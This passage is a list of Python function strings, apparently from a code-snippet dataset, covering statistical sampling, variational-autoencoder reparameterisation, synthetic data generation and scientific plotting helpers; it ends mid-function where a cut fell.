"def sample_multirange_empirical_variogram(dh: np.ndarray, gsd: float = None, coords: np.ndarray = None,\n nsamp: int = 10000, range_list: list = None, nrun: int = 1, nproc: int = 1,\n **kwargs) -> pd.DataFrame:\n # checks\n dh = dh.squeeze()\n if coords is None and gsd is None:\n raise TypeError('Must provide either coordinates or ground sampling distance.')\n elif gsd is not None and dh.ndim == 1:\n raise TypeError('Array must be 2-dimensional when providing only ground sampling distance')\n elif coords is not None and dh.ndim != 1:\n raise TypeError('Coordinate array must be provided with 1-dimensional input array')\n elif coords is not None and (coords.shape[0] != 2 and coords.shape[1] != 2):\n raise TypeError('One dimension of the coordinates array must be of length equal to 2')\n\n # defaulting to xx and yy if those are provided\n if coords is not None:\n if coords.shape[0] == 2 and coords.shape[1] != 2:\n coords = np.transpose(coords)\n else:\n x, y = np.meshgrid(np.arange(0, dh.shape[0] * gsd, gsd), np.arange(0, dh.shape[1] * gsd, gsd))\n coords = np.dstack((x.flatten(), y.flatten())).squeeze()\n dh = dh.flatten()\n\n # COMMENTING: custom binning is not supported by skgstat yet...\n # if no range list is specified, define a default one based on the spatial extent of the data and its resolution\n # if 'bin_func' not in kwargs.keys():\n # if range_list is None:\n #\n # # define max range as half the maximum distance between coordinates\n # max_range = np.sqrt((np.max(coords[:,0])-np.min(coords[:,0]))**2+(np.max(coords[:,1])-np.min(coords[:,1]))**2)/2\n #\n # # get the ground sampling distance\n # if gsd is None:\n # est_gsd = np.abs(coords[0,0] - coords[0,1])\n # else:\n # est_gsd = gsd\n #\n # # define ranges as multiple of the resolution until they get close to the maximum range\n # range_list = []\n # new_range = gsd\n # while new_range < max_range/10:\n # range_list.append(new_range)\n # new_range *= 10\n # range_list.append(max_range)\n #\n # else:\n # if range_list is not None:\n # print('Both range_list and bin_func are defined for binning: defaulting to bin_func')\n\n # default value we want to use (kmeans is failing)\n if 'bin_func' not in kwargs.keys():\n kwargs.update({'bin_func': 'even'})\n if 'n_lags' not in kwargs.keys():\n kwargs.update({'n_lags': 100})\n\n # estimate variogram\n if nrun == 1:\n # subsetting\n dh_sub, coords_sub = random_subset(dh, coords, nsamp)\n # getting empirical variogram\n print(dh_sub.shape)\n print(coords_sub.shape)\n df = get_empirical_variogram(dh=dh_sub, coords=coords_sub, **kwargs)\n df['exp_sigma'] = np.nan\n\n else:\n\n # multiple run only work for an even binning function for now (would need a customized binning not supported by skgstat)\n if kwargs.get('bin_func') is None:\n raise ValueError('Binning function must be \"even\" when doing multiple runs.')\n\n # define max range as half the maximum distance between coordinates\n max_range = np.sqrt((np.max(coords[:, 0])-np.min(coords[:, 0]))**2 +\n (np.max(coords[:, 1])-np.min(coords[:, 1]))**2)/2\n # also need a cutoff value to get the exact same bins\n if 'maxlag' not in kwargs.keys():\n kwargs.update({'maxlag': max_range})\n\n # TODO: somewhere here we could think of adding random sampling without replacement\n if nproc == 1:\n print('Using 1 core...')\n list_df_nb = []\n for i in range(nrun):\n dh_sub, coords_sub = random_subset(dh, coords, nsamp)\n df = get_empirical_variogram(dh=dh_sub, coords=coords_sub, **kwargs)\n df['run'] = i\n list_df_nb.append(df)\n else:\n print('Using 
'+str(nproc) + ' cores...')\n            list_dh_sub = []\n            list_coords_sub = []\n            for i in range(nrun):\n                dh_sub, coords_sub = random_subset(dh, coords, nsamp)\n                list_dh_sub.append(dh_sub)\n                list_coords_sub.append(coords_sub)\n\n            pool = mp.Pool(nproc, maxtasksperchild=1)\n            argsin = [{'dh': list_dh_sub[i], 'coords': list_coords_sub[i], 'i':i, 'max_i':nrun} for i in range(nrun)]\n            list_df = pool.map(partial(wrapper_get_empirical_variogram, **kwargs), argsin, chunksize=1)\n            pool.close()\n            pool.join()\n\n            list_df_nb = []\n            for i in range(nrun):\n                df_nb = list_df[i]\n                df_nb['run'] = i\n                list_df_nb.append(df_nb)\n            df = pd.concat(list_df_nb)\n\n        # group results, use mean as empirical variogram, estimate sigma, and sum the counts\n        df_grouped = df.groupby('bins', dropna=False)\n        df_mean = df_grouped[['exp']].mean()\n        df_sig = df_grouped[['exp']].std()\n        df_count = df_grouped[['count']].sum()\n        df_mean['bins'] = df_mean.index.values\n        df_mean['exp_sigma'] = df_sig['exp']\n        df_mean['count'] = df_count['count']\n        df = df_mean\n\n    return df",
"def sample_input_domain(num_samples):\n s1 = np.random.random(num_samples) * 10\n s2 = np.random.random(num_samples) * 2 - 5\n s3 = np.random.random(num_samples)\n s4 = np.random.random(num_samples) * 30 + 20\n return s1, s2, s3, s4",
"def wrapper_fit_func(x, ntraps, *args):\n a, b, c = list(args[0][:ntraps]), list(args[0][ntraps:2 * ntraps]), list(args[0][2 * ntraps:3 * ntraps])\n offset = args[0][-1]\n return gaussianarray1d(x, a, b, c, offset, ntraps)",
"def generate_data(func, points, seed=0):\n np.random.seed(seed)\n\n data = []\n for segment in points:\n x = np.linspace(*segment[\"xlim\"], num=segment[\"n_points\"])\n distribution = func(x)\n # Generate observations\n y = distribution.rvs()\n df = pd.DataFrame({\"x\": x, \"y\": y})\n data.append(df)\n\n return pd.concat(data, ignore_index=True)",
"def sampler(xaxis, yaxis, vals, x, y):\n i = 0\n while xaxis[i] < x:\n i += 1\n j = 0\n while yaxis[j] < y:\n j += 1\n return vals[i, j]",
"def sampling(args):\n\n z_mean, z_log_var = args\n batch = K.shape(z_mean)[0]\n dim = K.shape(z_mean)[1]\n epsilon = K.random_normal(shape=(batch, dim))\n return z_mean + K.exp(0.5 * z_log_var) * epsilon",
"def gen_fval_xs(funcs, n_inits, xdim, xmin, xmax, dtype=tf.float32, name='test'):\n if isinstance(funcs, list):\n print(\"List of functions\")\n\n n_funcs = len(funcs)\n xs_list = [[tf.get_variable(shape=(1,xdim), dtype=dtype, name='{}_{}_{}'.format(name, i, j),\n constraint=lambda x: tf.clip_by_value(x, xmin, xmax)) for i in range(n_inits)] for j in range(n_funcs)]\n\n xs = []\n for i in range(n_funcs):\n xs.append( tf.stack(xs_list[i]) )\n xs = tf.stack(xs)\n\n fvals = []\n for i in range(n_funcs):\n fvals_i = []\n for j in range(n_inits):\n fvals_i.append( tf.squeeze(funcs[i](xs_list[i][j])) )\n\n fvals.append( tf.squeeze(tf.stack(fvals_i)) )\n\n fvals = tf.stack(fvals)\n\n else: # funcs is a function\n print(\"A function\")\n xs_list = [tf.get_variable(shape=(1,xdim), dtype=dtype, name='test_func_mul_init_{}'.format(i),\n constraint=lambda x: tf.clip_by_value(x, xmin, xmax)) for i in range(n_inits)]\n\n fvals = [funcs(x) for x in xs_list]\n\n xs = tf.reshape(tf.concat(xs_list, axis=0), shape=(n_inits, xdim))\n fvals = tf.squeeze(tf.concat(fvals, axis=0))\n\n return xs, xs_list, fvals",
"def samples_multidimensional_uniform(bounds, points_count):\n dim = len(bounds)\n Z_rand = np.zeros(shape=(points_count, dim))\n for k in range(0,dim):\n Z_rand[:,k] = np.random.uniform(low=bounds[k][0], high=bounds[k][1], size=points_count)\n print('shape: ', Z_rand.shape)\n return Z_rand",
"def sampling(args):\n t_mean, t_log_var = args\n # YOUR CODE HERE\n epsilon = K.random_normal(t_mean.shape)\n z = epsilon * K.exp(0.5 * t_log_var) + t_mean\n return z",
"def sampling(args):\r\n\r\n z_mean, z_log_var = args\r\n batch = K.shape(z_mean)[0]\r\n dim = K.int_shape(z_mean)[1]\r\n # by default, random_normal has mean=0 and std=1.0\r\n epsilon = K.random_normal(shape=(batch, dim))\r\n return z_mean + K.exp(0.5 * z_log_var) * epsilon",
"def example_data(fs, Ts):\n\n # Number of points\n N = Ts * fs\n\n # random signals\n phi = np.pi / 2\n ax = [np.sin(2 * np.pi * 2 * (i / fs)) for i in range(N)]\n ay = [np.sin(2 * np.pi * 2 * (i / fs) + phi) for i in range(N)]\n Rx = [a * 0.01 + 0.5 for a in ax]\n Ry = [a * 0.01 + 0.3 for a in ay]\n\n # Make some noise!\n noise1 = np.random.normal(0, 0.1, N)\n noise2 = np.random.normal(0, 0.1, N)\n noise3 = np.random.normal(0, 0.1, N)\n noise4 = np.random.normal(0, 0.1, N)\n\n ax = ax + noise1\n ay = ay + noise2\n Rx = Rx + noise3\n Ry = Ry + noise4\n\n return ax, ay, Rx, Ry",
"def sampling(args):\n\n z_mean, z_log_var = args\n batch = K.shape(z_mean)[0]\n dim = K.int_shape(z_mean)[1]\n # by default, random_normal has mean=0 and std=1.0\n epsilon = K.random_normal(shape=(batch, dim))\n return z_mean + K.exp(0.5 * z_log_var) * epsilon",
"def sampling(args):\n\n z_mean, z_log_var = args\n batch = K.shape(z_mean)[0]\n dim = K.int_shape(z_mean)[1]\n # by default, random_normal has mean=0 and std=1.0\n epsilon = K.random_normal(shape=(batch, dim))\n return z_mean + K.exp(0.5 * z_log_var) * epsilon",
"def sampling(args):\n\n z_mean, z_log_var = args\n batch = K.shape(z_mean)[0]\n dim = K.int_shape(z_mean)[1]\n # by default, random_normal has mean=0 and std=1.0\n epsilon = K.random_normal(shape=(batch, dim))\n return z_mean + K.exp(0.5 * z_log_var) * epsilon",
"def sampling(args):\n\n z_mean, z_log_var = args\n batch = K.shape(z_mean)[0]\n dim = K.int_shape(z_mean)[1]\n # by default, random_normal has mean=0 and std=1.0\n epsilon = K.random_normal(shape=(batch, dim))\n return z_mean + K.exp(0.5 * z_log_var) * epsilon",
"def sampling(args):\n\n z_mean, z_log_var = args\n batch = K.shape(z_mean)[0]\n dim = K.int_shape(z_mean)[1]\n # by default, random_normal has mean=0 and std=1.0\n epsilon = K.random_normal(shape=(batch, dim))\n return z_mean + K.exp(0.5 * z_log_var) * epsilon",
"def Generate_Custom(f, n, m):\n return np.fromfunction(np.vectorize(f, otypes=[float]), (n,m))",
"def sampling(args):\n\n z_mean, z_log_var = args\n batch = K.shape(z_mean)[0]\n dim = K.int_shape(z_mean)[1]\n # by default, random_normal has mean = 0 and std = 1.0\n epsilon = K.random_normal(shape=(batch, dim))\n return z_mean + K.exp(0.5 * z_log_var) * epsilon",
"def resample_2d(array, sample_pts, query_pts, kind='linear'):\n interpf = interpolate.interp2d(*sample_pts, array, kind=kind)\n return interpf(*query_pts)",
"def filters(data, f_interval, f_resolution=None, sampling=None, w_column=None):\n print('-------------------------- filters')\n\n # Avoid overwritting data:\n data0 = data.copy()\n \n # Avoid 0 as input as not peaks are found:\n if f_interval[0]==0:\n f_interval = [f_resolution, f_interval[1]]\n \n # Calculates power spectrum:\n Pf_power, P_comp, _, _, = tt.power(data0, f_interval, f_resolution, sampling, w_column)\n t = data0[:,0]\n f = Pf_power[:,0]\n alpha = P_comp[:,0] \n beta = P_comp[:,1]\n\n # Calculates P_filter:\n P_filter = np.zeros(len(t))\n fpicon = 2*np.pi*f # Optimization constant\n for i in range(len(t)):\n tfpicon = fpicon*t[i] # Optimization constant\n alpha_sin = alpha*np.sin(tfpicon)\n beta_cos = beta* np.cos(tfpicon)\n P_filter[i] = np.sum(alpha_sin + beta_cos)\n\n # Calculates window function:\n Pf_window = tt.window(data0, f_interval, f_resolution, sampling)\n P_window = Pf_window[:,1]\n \n # Bandpass/Lowpass and Highpass filter:\n S_low_band = P_filter/np.sum(P_window)\n S_high = data0[:,1]-S_low_band\n St_low_band = np.vstack([t, S_low_band]).T\n St_high = np.vstack([t, S_high]).T\n return St_low_band, St_high",
"def generate_continuous_data_and_targets(\n n_dim,\n n_samples,\n mixing_factor=0.025,\n frac_positive=0.1):\n cov = generate_positive_semi_definite_matrix(n_dim)\n X = np.random.multivariate_normal(\n mean=np.zeros(n_dim),\n cov=cov,\n size=n_samples)\n weights = np.random.randn(n_dim)\n y_probs = sigmoid(mixing_factor * np.dot(X, weights))\n y = np.random.binomial(1, p=y_probs)\n X, y = subsample(X, y, frac_positive)\n return X, y",
"def variational_mfvi_sample(n_sample, qf_mean, qf_sdev,\n mfvi_mixture=False, mixture_par_list=None,\n **kwargs):\n\n \"\"\"Generates f samples from GPR mean-field variational family.\"\"\"\n q_f = tfd.MultivariateNormalDiag(loc=qf_mean, scale_diag=qf_sdev, )\n q_f_sample = q_f.sample(n_sample)\n\n if mfvi_mixture:\n (mixture_logits, mixture_logits_mfvi_mix,\n mean_mfvi_mix, sdev_mfvi_mix) = mixture_par_list\n\n q_f_sample_mfvi = inference_util.sample_mfvi_mixture_family(\n N_sample=n_sample,\n mixture_logits=mixture_logits_mfvi_mix,\n mean_mfvi_mix=mean_mfvi_mix,\n sdev_mfvi_mix=sdev_mfvi_mix, )\n\n mix_prob = tf.nn.softmax(mixture_logits)\n\n q_f_sample = tf.tensordot(\n tf.stack([q_f_sample_mfvi, q_f_sample], axis=-1), mix_prob,\n axes=[[-1], [0]])\n\n return q_f_sample",
"def sample (self, n):\n y = self.bins\n x = np.r_[0, self.values.cumsum ()] / self.sum\n # interpolate inverse CDF\n out = np.interp (np.random.random (n), x, y)\n if n == 1:\n return out[0]\n else:\n return out.reshape ((n,))",
"def show_trace_2d(f, results):\n plt.close()\n # draw input points\n plt.plot(*zip(*results), '-o', color='#ff7f0e')\n # get the field of figure\n x1, x2 = np.meshgrid(np.arange(-5.5, 1.0, 0.1), np.arange(-3.0, 1.0, 0.1))\n # draw the contour of function using x1,x2 as step\n plt.contour(x1, x2, f(x1, x2), colors='#1f77b4')\n plt.xlabel('x1')\n plt.ylabel('x2')\n plt.show()",
"def vary_fit(xvalues, yvalues, d_sample, r1_func, f_i, thetaS_i, phiS_i, phiS_max):\n params1 = Parameters()\n params1.add('ds', value=d_sample, vary=False)\n params1.add('thetaS', value=thetaS_i, min=0, max=d_sample)\n params1.add('f', value=f_i, min=3, max=300000)\n ## originally max was 1\n params1.add('phiS', value=phiS_i, min=0, max=phiS_max)\n params1.add('w', value=2.0/3.0, vary=False)\n params1.add('a', value=4.0/3.0, vary=False)\n ##originally thetaP, phiP had no minima\n params1.add('thetaP', expr='(ds*(1 + phiS*w*f + a*thetaS)-thetaS)/ \\\n ((1 - a*ds)*(phiS*w*f + a*thetaS)-(a*ds))')\n params1.add('phiP', expr='phiS*thetaP/thetaS')\n params1.add('c', expr='w*phiS*f/(1+w*phiS*f+thetaS*a)')\n params1.add('dp', expr='thetaP/(1+a*thetaP)')\n params1.add('dc', expr='thetaS/(1+a*thetaS)')\n minner1 = Minimizer(fcn2min, params1, fcn_args=(xvalues, yvalues, r1_func))\n try:\n fitres1 = minner1.minimize()\n except:\n fitres1 = None\n return fitres1",
"def testing_input_fn():\n dataset = tf.data.Dataset.range(len(cube_features))\n dataset = dataset.batch(16)\n dataset = dataset.map(mapping_function)\n return dataset",
"def simple_sampler(fun, start, sigma, iterations, verbose=False):\n mean = np.zeros(len(start))\n cov = np.eye(len(start)) * sigma\n\n if isinstance(start, np.ndarray):\n previous = start\n else:\n previous = np.array(start)\n\n f_previous = fun(previous)\n\n samples = np.zeros((iterations, len(start)))\n acceptance = 0\n for i in range(iterations):\n proposal = previous + np.random.multivariate_normal(mean=mean, cov=cov)\n f_proposal = fun(proposal)\n fun(previous)\n if (np.log(np.random.rand())) < (f_proposal - f_previous):\n previous = proposal\n acceptance += 1\n samples[i] = np.array(previous)\n\n if verbose:\n print('sampler acceptance = {0:.3f}'.format(acceptance / iterations))\n\n return samples",
"def _generate_data(n_inliers, n_outliers, n_features, coef, offset,\n random_state):\n\n inliers = coef * random_state.randn(n_inliers, n_features) + offset\n outliers = random_state.uniform(low=-1 * offset, high=offset,\n size=(n_outliers, n_features))\n X = np.r_[inliers, outliers]\n\n y = np.r_[np.zeros((n_inliers,)), np.ones((n_outliers,))]\n\n return X, y",
"def gen_data_for_plot(data, x, z=None, rand_sample_vars=[], mean_sample_vars=[], const_vars={}, stages='balanced', nstages=5, samples_per_x_range=500, truncate_to_percentile=0):\n data_points = data.copy()\n unq_x = data[x].unique()\n if len(unq_x) < 7: #catergorical\n x_data = data[x].sample(samples_per_x_range).values\n else:\n if truncate_to_percentile:\n x_data = np.linspace(np.percentile(data[x],truncate_to_percentile), np.percentile(data[x],100-truncate_to_percentile), samples_per_x_range)\n else:\n x_data = np.linspace(data[x].min(), data[x].max(), samples_per_x_range)\n df = pd.DataFrame({x:x_data})\n for var in mean_sample_vars:\n var_mean = data[var].mean(skipna=True)\n var_std = data[var].std(skipna=True)\n df[var] = var_mean\n data_points = data_points.loc[(var_mean-var_std<data_points[var]) & (data_points[var]<var_mean+var_std),:]\n\n for var in rand_sample_vars:\n df[var] = np.random.choice(data[var], size=(samples_per_x_range, ))\n\n for var, val in const_vars.items():\n df[var] = [val] * samples_per_x_range\n if 'consider' not in var:\n var_std = data[var].std(skipna=True)\n data_points = data_points.loc[(val - var_std < data_points[var]) & (data_points[var] < val + var_std), :]\n\n if stages == 'balanced':\n df_stages = pd.DataFrame({'current_epoch':list(range(nstages))})\n n_reps = int(np.ceil(df.shape[0]/df_stages.shape[0]))\n df_stages = pd.concat([df_stages]*n_reps, axis=0).iloc[0:samples_per_x_range,:].reset_index(drop=True)\n df_stages = df_stages.sample(frac=1).reset_index(drop=True)\n df = pd.concat([df, df_stages], axis=1, sort=False)\n\n if z is not None:\n data_cont = []\n unique_z = data[z].unique()\n if len(unique_z) >= 7: # make cont into categorical\n unique_z = np.linspace(data[z].min(), data[z].max(), 7)\n unique_z += (unique_z[1] - unique_z[0])/2\n unique_z = unique_z[:-1]\n\n for z_val in unique_z:\n new_df = df.copy()\n new_df[z] = z_val\n data_cont.append(new_df)\n df = pd.concat(data_cont, axis=0)\n\n return df, data_points",
"def _nd_plot_samples(self, **kwargs):\n\n from pesummary.core.plots.plot import _make_comparison_corner_plot as plotfunc\n\n plotkwargs = kwargs.copy()\n\n args = [self._samples]\n plotkwargs[\"corner_parameters\"] = self.parameters\n if \"latex_labels\" not in kwargs:\n plotkwargs[\"latex_labels\"] = self.latex_labels\n\n if \"plot_percentile\" not in kwargs:\n plotkwargs[\"plot_percentile\"] = False\n\n # get ranges for each parameter to set figure axes extents\n if \"range\" not in kwargs:\n range = []\n for param in self.parameters:\n range.append(\n [\n np.min(\n [samps[param].min() for samps in self._samples.values()]\n ),\n np.max(\n [samps[param].max() for samps in self._samples.values()]\n ),\n ]\n )\n plotkwargs[\"range\"] = range\n\n # default to not show quantile lines\n plotkwargs.setdefault(\"quantiles\", None)\n\n # set default injection line color\n plotkwargs.setdefault(\"truth_color\", \"k\")\n\n # set injection parameter values\n if self.injection_parameters is not None:\n injpars = [\n self.injection_parameters[p] - self.parameter_offsets[p]\n for p in self.parameters\n if self.injection_parameters[p] is not None\n ]\n if len(injpars) == self._num_parameters:\n plotkwargs[\"truths\"] = injpars\n\n # create plot\n with DisableLogger():\n fig = plotfunc(*args, **plotkwargs)\n\n # turn frame off on legend\n fig.legends[0].set_frame_on(False)\n\n return fig",
"def get_gaussian_axis_sample(a, b, N, dtype):\n assert a < b, \"condition a < b violated!\"\n assert isinstance(N, int), \"condition N of type int violated!\"\n\n data = []\n for n in range(N):\n x = a + get_norm_cdf(N)[n]*(b-a)\n if dtype is int:\n data.append(int(x))\n elif dtype is float:\n data.append(x)\n else:\n raise AssertionError(\"dtype {} not supported for uniform sampling!\".format(dtype))\n return data",
"def distr_of_function(dstn, func=lambda x: x, *args):\n # Apply function to every event realization\n f_query = [func(dstn.atoms[..., i], *args) for i in range(len(dstn.pmv))]\n\n # Stack results along their last (new) axis\n f_query = np.stack(f_query, axis=-1)\n\n f_dstn = DiscreteDistribution(dstn.pmv, f_query)\n\n return f_dstn",
"def InterpolateFunctions(self, , p_float=..., p_float=..., p_float=..., p_float=..., p_float=..., p_float=..., p_float=..., p_float=..., p_float=..., p_float=...):\n ...",
"def eval_r_func_3(f, x, y, t):\n elementary_func = ['prod', 'avg', 'cos_pi', 'sin_pi']\n if f[0] == \"x\":\n return x\n elif f[0] == \"y\":\n return y\n elif f[0] == \"t\":\n return t\n else:\n if f[0] == elementary_func[0]:\n first_argument = eval_r_func_3(f[1], x, y, t)\n second_argument = eval_r_func_3(f[2], x, y, t)\n return first_argument * second_argument\n elif f[0] == elementary_func[1]:\n first_argument = eval_r_func_3(f[1], x, y, t)\n second_argument = eval_r_func_3(f[2], x, y, t)\n return .5*(first_argument + second_argument)\n elif f[0] == elementary_func[2]:\n argument = eval_r_func_3(f[1], x, y, t)\n ans = math.cos(math.pi * argument)\n return ans\n elif f[0] == elementary_func[3]:\n argument = eval_r_func_3(f[1], x, y, t)\n ans = math.sin(math.pi * argument)\n return ans",
"def sliced_fun(f, n_slices):\n\n def sliced_f(sliced_inputs, non_sliced_inputs=None):\n if non_sliced_inputs is None:\n non_sliced_inputs = []\n if isinstance(non_sliced_inputs, tuple):\n non_sliced_inputs = list(non_sliced_inputs)\n n_paths = len(sliced_inputs[0])\n slice_size = max(1, n_paths // n_slices)\n ret_vals = None\n for start in range(0, n_paths, slice_size):\n inputs_slice = [v[start:start + slice_size] for v in sliced_inputs]\n slice_ret_vals = f(*(inputs_slice + non_sliced_inputs))\n if not isinstance(slice_ret_vals, (tuple, list)):\n slice_ret_vals_as_list = [slice_ret_vals]\n else:\n slice_ret_vals_as_list = slice_ret_vals\n scaled_ret_vals = [\n np.asarray(v) * len(inputs_slice[0])\n for v in slice_ret_vals_as_list\n ]\n if ret_vals is None:\n ret_vals = scaled_ret_vals\n else:\n ret_vals = [x + y for x, y in zip(ret_vals, scaled_ret_vals)]\n ret_vals = [v / n_paths for v in ret_vals]\n if not isinstance(slice_ret_vals, (tuple, list)):\n ret_vals = ret_vals[0]\n elif isinstance(slice_ret_vals, tuple):\n ret_vals = tuple(ret_vals)\n return ret_vals\n\n return sliced_f",
"def mpld3_multivariate_2d_gd(\n filename: str= \"\",\n name_labels: List[str] = [],\n colors: List[str] = [],\n functions: list = [], # list of funtions\n target_function: List[np.ndarray] = [],\n cmap_target: List[str] = [],\n label_target: List[str] = [],\n fedavg_clients=None,\n fedavg_eval=None,\n fedavg_communication_rounds: List[int] = [10],\n fedavg_steps_local: List[int] = [10],\n title: str = \"\",\n hist_slice=slice(None),\n theta=START_THETA,\n):\n assert (\n len(name_labels) == len(colors) == len(functions)\n ), \"incorrect settings. for each function, specify a matplotlib color and label name\"\n\n assert (\n len(target_function) == len(cmap_target) == len(label_target) \n ), \"incorrect settings. only one target function can be plotted\"\n\n print(\n f\"create 2D plot using SGD on {list(zip(name_labels, colors))}\"\n f\" over distribution {label_target}\"\n )\n\n # 2D Settings\n fig = plt.figure()\n ax = plt.gca()\n \n offset_contour = -0.15\n labels_all = []\n plots_all = []\n plots_hover = []\n hover_label = []\n visibillity_label = []\n ax.set_xlabel('\\u03F4_0', fontdict={'fontsize': 18})\n ax.set_ylabel('\\u03F4_1', fontdict={'fontsize': 18})\n \n\n # plot target function\n for i in range(len(target_function)):\n plotted = ax.contourf(\n X,\n Y,\n target_function[i],\n cmap=cmap_target[i],\n zorder=0,\n alpha=.97,\n ).collections\n plots_all.append(plotted)\n labels_all.append(f\"toggle {label_target[i]}\")\n if i == 0:\n visibillity_label.append(True)\n else:\n visibillity_label.append(False)\n # hover_label.append(\"\")\n \n # history of regular GD\n for i in range(len(name_labels)):\n history = grad_descent(functions[i], theta = theta)\n history = history[hist_slice]\n plotted, = ax.plot(\n history[:, 0],\n history[:, 1],\n label=name_labels[i],\n c=colors[i],\n lw=5,\n zorder=100,\n )\n plots_all.append(plotted)\n labels_all.append(f\"toggle {name_labels[i]}\")\n plots_hover.append(plotted)\n hover_label.append(f\"{name_labels[i]}_acc_{str(history[-1, 2])[:5]}\")\n if i == 0:\n visibillity_label.append(True)\n else:\n visibillity_label.append(False)\n\n\n # history of FedAvg\n if fedavg_clients is not None:\n for i in range(len(fedavg_communication_rounds)):\n hs, h_clients = fedavg(\n function_clients=fedavg_clients,\n function_eval=fedavg_eval,\n communication_rounds=fedavg_communication_rounds[i],\n gd_steps_local=fedavg_steps_local[i],\n theta = theta,\n )\n hs = hs[hist_slice]\n plotted, = ax.plot(hs[:, 0], hs[:, 1], label=\"FedAvg\", c=\"red\", lw=5, zorder=100)\n \n plots_all.append(plotted)\n labels_all.append(f\"toggle FedAvg_rounds_{fedavg_communication_rounds[i]}_steps_{fedavg_steps_local[i]}\")\n plots_hover.append(plotted)\n hover_label.append(f\"FedAvg_acc_{str(hs[-1, 2])[:5]}_rounds_{fedavg_communication_rounds[i]}_steps_{fedavg_steps_local[i]}\")\n if i == 0:\n visibillity_label.append(True)\n else:\n visibillity_label.append(False)\n top = 3.5 \n height_from_top = top - len(labels_all) * 0.22\n height_to_top = 3.5 - height_from_top\n ax.add_patch(matplotlib.patches.Rectangle((1.8,height_from_top),1.7,height_to_top, facecolor='white', capstyle=\"round\"))\n \n if title:\n ax.set_title(title, fontdict={'fontsize': 18})\n\n fig.savefig(f\"{filename}.svg\")\n\n if \"mpld3\" in sys.modules:\n interactive_legend = mpld3.plugins.InteractiveLegendPlugin(plots_all, labels_all, alpha_over=1.5, alpha_unsel=0.2, \n start_visible=visibillity_label, font_size=18, legend_offset=(-255,-5)) # -1050,-5\n \n hover = [mpld3.plugins.LineLabelTooltip(pl,label=lb) for pl, 
lb in zip( plots_hover, hover_label)]\n mpld3.plugins.connect(fig, interactive_legend, *hover)\n \n\n # Show the interactive figure in the notebook\n mpld3.display()\n mpld3.save_html(fig, f\"{filename}.html\")\n \n # try to creat figure mpld3, but 3d plots are not supported.\n return fig",
"def input_fn(params):\n assert params[\"batch_size\"] * num_core_per_host == bsz_per_host\n\n datasets = []\n for files, func in zip(file_list, func_list):\n if files:\n cur_dataset = func(\n params=params,\n num_hosts=num_hosts,\n num_core_per_host=num_core_per_host,\n is_training=split == \"train\",\n file_names=files,\n seq_len=seq_len,\n num_predict=num_predict,\n use_bfloat16=use_bfloat16,\n **kwargs)\n\n datasets.append(cur_dataset)\n\n if len(datasets) > 1:\n dataset = tf.data.experimental.sample_from_datasets(datasets)\n elif len(datasets) == 1:\n dataset = datasets[0]\n\n return dataset",
"def generate_dataset_zipf(n, alpha=1.1):\n return [(np.random.zipf(alpha), 1) for _ in range(n)]",
"def fcontourf(f, x1range, x2range, yrange, **kwargs):\n x1s = np.linspace(x1range[0], x1range[1])\n x2s = np.linspace(x2range[0], x2range[1])\n ys = np.linspace(yrange[0], yrange[1], 20)\n fs = [[f(np.array([x1,x2])) for x1 in x1s] for x2 in x2s]\n plt.contourf(x1s, x2s, fs, ys, **kwargs)\n plt.axis('scaled')",
"def sample_1D_fromClass(manifold, f_on_manifold,\n n_samples, noise_level, tube = 'l2', var_f = 0.0,\n return_original = False, args_f = None):\n # Find length corresponding to end parameter b\n s_disc = np.random.uniform(low = manifold.get_start(),\n high = manifold.get_end(), size = (n_samples))\n # s_disc = np.sort(s_disc)\n n_features = manifold.get_n_features()\n # Containers\n basepoints = np.zeros((n_features, n_samples))\n points = np.zeros((n_features, n_samples))\n points_original = np.zeros((n_features, n_samples)) # Contains t + normal coefficients\n points_original[0,:] = s_disc\n tangentspaces = np.zeros((n_features, 1, n_samples))\n normalspaces = np.zeros((n_features, n_features - 1, n_samples))\n fval = np.zeros(n_samples)\n # Sample Detachment Coefficients\n if tube == 'linfinity':\n # Sample detachment coefficients from ||k||_inf < noise_level.\n random_coefficients = np.random.uniform(-noise_level, noise_level,\n size = (n_features - 1, n_samples))\n elif tube == 'l2':\n # Sample detachment coefficients from ||k||_2 < noise_level\n rand_sphere = np.random.normal(size = (n_features - 1, n_samples))\n rand_sphere = rand_sphere/np.linalg.norm(rand_sphere, axis = 0)\n radii = np.random.uniform(0, 1, size = n_samples)\n radii = noise_level * np.power(radii, 1.0/(n_features - 1))\n random_coefficients = rand_sphere * radii\n points_original[1:,:] = random_coefficients\n for i in range(n_samples):\n basepoints[:,i] = manifold.get_basepoint(s_disc[i])\n tangentspaces[:,0,i] = manifold.get_tangent(s_disc[i])\n normalspaces[:,:,i] = manifold.get_normal(s_disc[i])\n normal_vector = np.sum(normalspaces[:,:,i] * random_coefficients[:,i],\n axis=1)\n points[:,i] = basepoints[:,i] + normal_vector\n if args_f is not None:\n fval[i] = f_on_manifold(np.array([s_disc[i]]), manifold.get_start(), manifold.get_end(), *args_f)\n else:\n fval[i] = f_on_manifold(np.array([s_disc[i]]))\n # Apply noise to the function values\n fval_clean = np.copy(fval)\n if var_f > 0.0:\n Ymin, Ymax = np.min(fval_clean), np.max(fval_clean)\n avg_grad = (Ymax - Ymin)/(manifold.get_end() - manifold.get_start())\n fval_noise = np.random.uniform(low = -avg_grad * np.sqrt(var_f), high = avg_grad * np.sqrt(var_f),\n size = n_samples)\n fval += fval_noise\n if return_original:\n return s_disc, points, points_original, normalspaces, fval, fval_clean,\\\n tangentspaces, basepoints\n else:\n return s_disc, points, normalspaces, fval, fval_clean,\\\n tangentspaces, basepoints",
"def _2d_plot_samples(self, **kwargs):\n\n from pesummary.core.plots.bounded_2d_kde import Bounded_2d_kde\n\n # get bounds\n lows = []\n highs = []\n methods = []\n for param in self.parameters[0:2]:\n if param in DEFAULT_BOUNDS:\n lows.append(\n DEFAULT_BOUNDS[param][\"low\"]\n if \"low\" in DEFAULT_BOUNDS[param]\n else None\n )\n highs.append(\n DEFAULT_BOUNDS[param][\"high\"]\n if \"high\" in DEFAULT_BOUNDS[param]\n else None\n )\n methods.append(\n DEFAULT_BOUNDS[param][\"method\"]\n if \"method\" in DEFAULT_BOUNDS[param]\n else \"Reflection\"\n )\n\n if self.plottype == \"triangle\":\n from pesummary.core.plots.publication import triangle_plot as plotfunc\n elif self.plottype == \"reverse_triangle\":\n from pesummary.core.plots.publication import (\n reverse_triangle_plot as plotfunc,\n )\n else:\n # contour plot\n from pesummary.core.plots.publication import (\n comparison_twod_contour_plot as plotfunc,\n )\n\n # set KDE information\n kwargs.update(\n {\n \"kde\": Bounded_2d_kde,\n \"kde_kwargs\": {\n \"xlow\": lows[0],\n \"xhigh\": highs[0],\n \"ylow\": 